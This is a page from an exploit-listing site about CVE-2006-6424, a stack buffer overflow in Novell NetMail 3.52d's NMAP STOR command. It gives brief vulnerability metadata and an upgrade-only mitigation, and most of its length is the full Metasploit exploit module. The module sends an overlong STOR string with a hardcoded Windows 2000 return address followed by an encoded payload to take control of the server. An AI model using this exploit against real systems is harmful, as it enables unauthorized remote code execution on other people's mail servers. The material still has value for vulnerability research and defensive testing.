Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Novell NetMail - exploit.company
header-logo
Suggest Exploit
vendor:
Netmail
by:
MC
7.5
CVSS
HIGH
Stack Buffer Overflow
119
CWE
Product Name: Netmail
Affected Version From: 3.52d and below
Affected Version To: 3.52d
Patch Exists: NO
Related CWE: CVE-2006-6424
CPE: Novell:netmail:3.52d
Metasploit:
Other Scripts:
Platforms Tested: Windows
2006

Novell NetMail <= 3.52d NMAP STOR Buffer Overflow

This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

Mitigation:

Upgrade to a version higher than 3.52d.
Source

Exploit-DB raw data:

##
# $Id: nmap_stor.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell NetMail <= 3.52d NMAP STOR Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR
				verb. By sending an overly long string, an attacker can overwrite the
				buffer and control program execution.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-6424' ],
					[ 'OSVDB', '31363' ],
					[ 'BID', '21725' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Pro SP4 English',   { 'Ret' => 0x7cdc97fb }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 23 2006'))

		register_options([Opt::RPORT(689)], self.class)
	end

	def exploit
		connect
		sock.get_once

		auth =  "USER " + rand_text_english(10)
		sock.put(auth + "\r\n")

		res = sock.get_once

		sploit =  "STOR " + rand_text_english(253) + [ target.ret ].pack('V')
		sploit << " " + rand_text_english(20) + "\r\n" + payload.encoded

		if (res =~ /1000/)
			print_status("Trying target #{target.name}...")
			sock.put(sploit)
		else
			print_status("Not in Trusted Hosts.")
		end

		handler
		disconnect
	end
end